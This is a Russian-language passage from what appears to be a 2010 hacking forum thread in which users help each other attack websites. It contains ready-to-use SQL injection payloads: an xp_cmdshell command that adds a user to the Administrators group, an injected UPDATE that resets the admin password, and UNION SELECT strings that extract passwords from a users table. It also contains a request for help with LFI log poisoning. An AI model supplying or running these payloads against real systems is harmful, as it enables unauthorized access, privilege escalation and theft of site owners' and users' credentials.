2pinch нет от этого не зависеть
если есть права то кмдшелл то добавь сам админа EXEC xp_cmdshell 'net localgroup Administrators test_user /add'
в твоем случае можешь поменять пароль от админа (ну если превелегии есть)
?id=1; UPDATE 'admin_login' SET 'password' = 'password' WHERE login_name='sa--
Последний раз редактировалось shell_c0de; 30.04.2010 в 14:56..
есть LFI, нашел еrror.log и access.log, access читать не получается т.к. размер большой, остался только еrror.
Делаю запрос вида http://www.site.com/<? траляля ?>
В лог пишется %3C? траляля ?%3E.
Что же делать?)
Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users
count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?
Последний раз редактировалось Gorev; 30.04.2010 в 22:40..